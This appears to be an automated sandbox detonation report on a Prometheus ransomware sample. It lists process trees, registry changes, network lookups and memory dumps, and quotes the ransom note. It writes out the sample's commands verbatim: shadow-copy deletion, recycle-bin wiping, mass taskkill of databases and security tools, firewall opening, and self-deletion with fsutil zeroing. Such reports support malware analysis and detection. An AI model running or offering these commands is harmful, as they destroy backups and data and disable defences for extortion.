PID 788 wrote to memory of 1948 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\system32\taskkill.exe
PID 788 wrote to memory of 1948 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\system32\taskkill.exe
PID 788 wrote to memory of 912 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\system32\netsh.exe
PID 788 wrote to memory of 912 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\system32\netsh.exe
PID 788 wrote to memory of 912 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\system32\netsh.exe
PID 788 wrote to memory of 276 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\system32\taskkill.exe
PID 788 wrote to memory of 276 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\system32\taskkill.exe
PID 788 wrote to memory of 276 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\system32\taskkill.exe
PID 788 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\system32\taskkill.exe
PID 788 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\system32\taskkill.exe
PID 788 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\system32\taskkill.exe
PID 788 wrote to memory of 1448 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\system32\taskkill.exe
PID 788 wrote to memory of 1448 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\system32\taskkill.exe
PID 788 wrote to memory of 1448 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\system32\taskkill.exe
PID 788 wrote to memory of 1300 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\system32\arp.exe
PID 788 wrote to memory of 1300 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\system32\arp.exe
PID 788 wrote to memory of 1300 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\system32\arp.exe
PID 788 wrote to memory of 1028 N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe C:\Windows\system32\taskkill.exe

System policy modification

evasion
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext = "All your important files have been encrypted!\r\nYour files are safe! Only modified.(AES) \r\nNo software available on internet can help you.\r\nWe are the only ones able to decrypt your files.\r\n\r\n!!!!!!!!!!!!!!!!!!!!!!!!\r\nIf you decide not to work with us: \r\nAll data on your computers will remain encrypted forever. \r\nYOUR DATA ON OUR SERVER AND WE WILL RELEASE YOUR DATA TO PUBLIC OR RE-SELLER!\r\nSo you can expect your data to be publicly available in the near future.. \r\nThe price will increase over time. \r\n!!!!!!!!!!!!!!!!!!!!!!!!!\r\n\r\nFull information in the file RESTORE_FILES_INFO" C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy = "1" C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption = "YOUR COMPANY NETWORK HAS BEEN HACKED" C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe

"C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe"

C:\Windows\system32\taskkill.exe

"taskkill" /F /IM RaccineSettings.exe

C:\Windows\system32\reg.exe

"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F

C:\Windows\system32\reg.exe

"reg" delete HKCU\Software\Raccine /F

C:\Windows\system32\schtasks.exe

"schtasks" /DELETE /TN "Raccine Rules Updater" /F

C:\Windows\system32\netsh.exe

"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes

C:\Windows\system32\sc.exe

"sc.exe" config Dnscache start= auto

C:\Windows\system32\sc.exe

"sc.exe" config FDResPub start= auto

C:\Windows\system32\sc.exe

"sc.exe" config SQLTELEMETRY start= disabled

C:\Windows\system32\sc.exe

"sc.exe" config SSDPSRV start= auto

C:\Windows\system32\sc.exe

"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled

C:\Windows\system32\sc.exe

"sc.exe" config SstpSvc start= disabled

C:\Windows\system32\sc.exe

"sc.exe" config SQLWriter start= disabled

C:\Windows\system32\sc.exe

"sc.exe" config upnphost start= auto

C:\Windows\system32\taskkill.exe

"taskkill.exe" /IM mspub.exe /F

C:\Windows\system32\taskkill.exe

"taskkill.exe" /IM synctime.exe /F

C:\Windows\system32\taskkill.exe

"taskkill.exe" /IM mspub.exe /F

C:\Windows\system32\netsh.exe

"netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes

C:\Windows\system32\taskkill.exe

"taskkill.exe" /IM mydesktopqos.exe /F

C:\Windows\system32\taskkill.exe

"taskkill.exe" /IM mysqld.exe /F

C:\Windows\system32\taskkill.exe

"taskkill.exe" /IM Ntrtscan.exe /F

C:\Windows\system32\arp.exe

"arp" -a

C:\Windows\system32\taskkill.exe

"taskkill.exe" /IM sqbcoreservice.exe /F

C:\Windows\system32\taskkill.exe

"taskkill.exe" /IM mydesktopservice.exe /F

C:\Windows\system32\taskkill.exe

"taskkill.exe" /IM isqlplussvc.exe /F

C:\Windows\system32\taskkill.exe

"taskkill.exe" /IM firefoxconfig.exe /F

C:\Windows\system32\taskkill.exe

"taskkill.exe" /IM onenote.exe /F

C:\Windows\system32\taskkill.exe

"taskkill.exe" /IM encsvc.exe /F

C:\Windows\system32\taskkill.exe

"taskkill.exe" /IM agntsvc.exe /F

C:\Windows\system32\taskkill.exe

"taskkill.exe" /IM PccNTMon.exe /F

C:\Windows\system32\taskkill.exe

"taskkill.exe" /IM excel.exe /F

C:\Windows\system32\taskkill.exe

"taskkill.exe" /IM msaccess.exe /F

C:\Windows\system32\taskkill.exe

"taskkill.exe" /IM thebat.exe /F

C:\Windows\system32\taskkill.exe

"taskkill.exe" /IM CNTAoSMgr.exe /F

C:\Windows\system32\taskkill.exe

"taskkill.exe" /IM outlook.exe /F

C:\Windows\system32\taskkill.exe

"taskkill.exe" /IM steam.exe /F

C:\Windows\system32\taskkill.exe

"taskkill.exe" /IM sqlwriter.exe /F

C:\Windows\system32\taskkill.exe

"taskkill.exe" /IM tmlisten.exe /F

C:\Windows\system32\taskkill.exe

"taskkill.exe" /IM tbirdconfig.exe /F

C:\Windows\system32\taskkill.exe

"taskkill.exe" /IM dbsnmp.exe /F

C:\Windows\system32\taskkill.exe

"taskkill.exe" /IM msftesql.exe /F

C:\Windows\system32\taskkill.exe

"taskkill.exe" /IM dbeng50.exe /F

C:\Windows\system32\taskkill.exe

"taskkill.exe" /IM xfssvccon.exe /F

C:\Windows\system32\taskkill.exe

"taskkill.exe" /IM powerpnt.exe /F

C:\Windows\system32\taskkill.exe

"taskkill.exe" /IM thebat64.exe /F

C:\Windows\system32\taskkill.exe

"taskkill.exe" /IM mydesktopqos.exe /F

C:\Windows\system32\taskkill.exe

"taskkill.exe" /IM wordpad.exe /F

C:\Windows\system32\taskkill.exe

"taskkill.exe" /IM ocomm.exe /F

C:\Windows\system32\taskkill.exe

"taskkill.exe" /IM visio.exe /F

C:\Windows\system32\taskkill.exe

"taskkill.exe" /IM mysqld-opt.exe /F

C:\Windows\system32\taskkill.exe

"taskkill.exe" /IM infopath.exe /F

C:\Windows\system32\taskkill.exe

"taskkill.exe" /IM mydesktopservice.exe /F

C:\Windows\system32\taskkill.exe

"taskkill.exe" /IM ocautoupds.exe /F

C:\Windows\system32\taskkill.exe

"taskkill.exe" /IM mbamtray.exe /F

C:\Windows\system32\taskkill.exe

"taskkill.exe" /IM winword.exe /F

C:\Windows\system32\taskkill.exe

"taskkill.exe" /IM ocssd.exe /F

C:\Windows\system32\taskkill.exe

"taskkill.exe" /IM zoolz.exe /F

C:\Windows\system32\taskkill.exe

"taskkill.exe" /IM mysqld-nt.exe /F

C:\Windows\system32\taskkill.exe

"taskkill.exe" /IM oracle.exe /F

C:\Windows\system32\taskkill.exe

"taskkill.exe" IM thunderbird.exe /F

C:\Windows\system32\taskkill.exe

"taskkill.exe" /IM sqlagent.exe /F

C:\Windows\system32\taskkill.exe

"taskkill.exe" /IM sqlbrowser.exe /F

C:\Windows\system32\taskkill.exe

"taskkill.exe" /IM sqlservr.exe /F

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }

C:\Windows\system32\cmd.exe

"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin

C:\Windows\system32\netsh.exe

"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes

C:\Windows\system32\netsh.exe

"netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes

C:\Windows\system32\arp.exe

"arp" -a

C:\Windows\System32\mshta.exe

"C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta

C:\Windows\system32\cmd.exe

"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”

C:\Windows\system32\PING.EXE

ping 127.0.0.7 -n 3

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=524288 “%s”

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe

C:\Windows\system32\choice.exe

choice /C Y /N /D Y /T 3

Network

Country Destination Domain Proto
US 8.8.8.8:53 www.poweradmin.com udp
US 52.1.55.52:443 www.poweradmin.com tcp
US 8.8.8.8:53 live.sysinternals.com udp
GB 20.49.223.105:80 live.sysinternals.com tcp
N/A 10.7.0.255:3 udp
N/A 10.7.0.255:3 udp

Files

memory/788-60-0x0000000000FC0000-0x0000000000FC1000-memory.dmp

memory/788-62-0x00000000004D0000-0x00000000004D2000-memory.dmp

memory/316-63-0x0000000000000000-mapping.dmp

memory/860-64-0x0000000000000000-mapping.dmp

memory/1452-65-0x0000000000000000-mapping.dmp

memory/760-66-0x0000000000000000-mapping.dmp

memory/2036-69-0x0000000000000000-mapping.dmp

memory/1056-67-0x0000000000000000-mapping.dmp

memory/1540-68-0x0000000000000000-mapping.dmp

memory/1092-70-0x0000000000000000-mapping.dmp

memory/1056-71-0x000007FEFBC81000-0x000007FEFBC83000-memory.dmp

memory/1104-72-0x0000000000000000-mapping.dmp

memory/1576-74-0x0000000000000000-mapping.dmp

memory/648-73-0x0000000000000000-mapping.dmp

memory/1016-75-0x0000000000000000-mapping.dmp

memory/272-76-0x0000000000000000-mapping.dmp

memory/1460-77-0x0000000000000000-mapping.dmp

memory/620-78-0x0000000000000000-mapping.dmp

memory/1948-79-0x0000000000000000-mapping.dmp

memory/912-80-0x0000000000000000-mapping.dmp

memory/276-82-0x0000000000000000-mapping.dmp

memory/1720-83-0x0000000000000000-mapping.dmp

memory/1448-84-0x0000000000000000-mapping.dmp

memory/1300-85-0x0000000000000000-mapping.dmp

memory/1028-86-0x0000000000000000-mapping.dmp

memory/1592-87-0x0000000000000000-mapping.dmp

memory/876-88-0x0000000000000000-mapping.dmp

memory/1584-89-0x0000000000000000-mapping.dmp

memory/320-90-0x0000000000000000-mapping.dmp

memory/592-91-0x0000000000000000-mapping.dmp

memory/1192-92-0x0000000000000000-mapping.dmp

memory/1316-93-0x0000000000000000-mapping.dmp

memory/660-94-0x0000000000000000-mapping.dmp

memory/1596-95-0x0000000000000000-mapping.dmp

memory/1072-96-0x0000000000000000-mapping.dmp

memory/1220-97-0x0000000000000000-mapping.dmp

memory/1644-98-0x0000000000000000-mapping.dmp

memory/1624-99-0x0000000000000000-mapping.dmp

memory/1724-100-0x0000000000000000-mapping.dmp

memory/848-101-0x0000000000000000-mapping.dmp

memory/376-102-0x0000000000000000-mapping.dmp

memory/732-103-0x0000000000000000-mapping.dmp

memory/1688-104-0x0000000000000000-mapping.dmp

memory/1196-106-0x0000000000000000-mapping.dmp

memory/1320-105-0x0000000000000000-mapping.dmp

memory/1464-107-0x0000000000000000-mapping.dmp

memory/964-108-0x0000000000000000-mapping.dmp

memory/1852-109-0x0000000000000000-mapping.dmp

memory/560-110-0x0000000000000000-mapping.dmp

memory/532-111-0x0000000000000000-mapping.dmp

memory/2040-112-0x0000000000000000-mapping.dmp

memory/472-113-0x0000000000000000-mapping.dmp

memory/1600-114-0x0000000000000000-mapping.dmp

memory/1364-115-0x0000000000000000-mapping.dmp

memory/1764-116-0x0000000000000000-mapping.dmp

memory/2056-117-0x0000000000000000-mapping.dmp

memory/2088-118-0x0000000000000000-mapping.dmp

memory/2112-119-0x0000000000000000-mapping.dmp

memory/2188-120-0x0000000000000000-mapping.dmp

memory/2216-121-0x0000000000000000-mapping.dmp

memory/2244-122-0x0000000000000000-mapping.dmp

memory/2320-123-0x0000000000000000-mapping.dmp

memory/2348-124-0x0000000000000000-mapping.dmp

memory/2400-125-0x0000000000000000-mapping.dmp

memory/2444-126-0x0000000000000000-mapping.dmp

memory/2488-127-0x0000000000000000-mapping.dmp

memory/2488-129-0x0000000002400000-0x0000000002401000-memory.dmp

memory/2488-130-0x000000001AC90000-0x000000001AC91000-memory.dmp

memory/2488-131-0x00000000025C0000-0x00000000025C1000-memory.dmp

memory/2488-132-0x00000000025F0000-0x00000000025F1000-memory.dmp

memory/2488-133-0x000000001AC10000-0x000000001AC12000-memory.dmp

memory/2488-134-0x000000001AC14000-0x000000001AC16000-memory.dmp

memory/2608-135-0x0000000000000000-mapping.dmp

C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta

MD5 b10e6556b6508def4538c9b58a6ad5b7
SHA1 247d5eb8ee2c9588cd564b9a1f8ba4e1954448d3
SHA256 6506ac26ec8d98d608bef954d04d1959677b440ecf2fbf85e844ff0b46468fff
SHA512 276953c5d44d0e006031f14f69095ad240b9f9208f93d5b367da6e034c0512a4549569d67419a47c71caf4201191529f6b444a6ffd1436b5d1279b84e599de46

Analysis: behavioral2

Detonation Overview

Submitted

2021-05-28 09:36

Reported

2021-05-28 09:38

Platform

win10v20210408

Max time kernel

116s

Max time network

136s

Command Line

"C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe"

Signatures

Prometheus Ransomware

ransomware prometheus

Modifies Windows Firewall

evasion

Modifies extensions of user files

ransomware
Description Indicator Process Target
File opened for modification C:\Users\Admin\Pictures\CompleteDisconnect.tiff C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
File opened for modification C:\Users\Admin\Pictures\MergeUnregister.tiff C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A

Modifies WinLogon

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "YOUR COMPANY NETWORK HAS BEEN HACKED" C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "All your important files have been encrypted!\r\nYour files are safe! Only modified.(AES) \r\nNo software available on internet can help you.\r\nWe are the only ones able to decrypt your files.\r\n\r\n!!!!!!!!!!!!!!!!!!!!!!!!\r\nIf you decide not to work with us: \r\nAll data on your computers will remain encrypted forever. \r\nYOUR DATA ON OUR SERVER AND WE WILL RELEASE YOUR DATA TO PUBLIC OR RE-SELLER!\r\nSo you can expect your data to be publicly available in the near future.. \r\nThe price will increase over time. \r\n!!!!!!!!!!!!!!!!!!!!!!!!!\r\n\r\nFull information in the file RESTORE_FILES_INFO" C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A

Launches sc.exe

Enumerates physical storage devices

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\reg.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe N/A
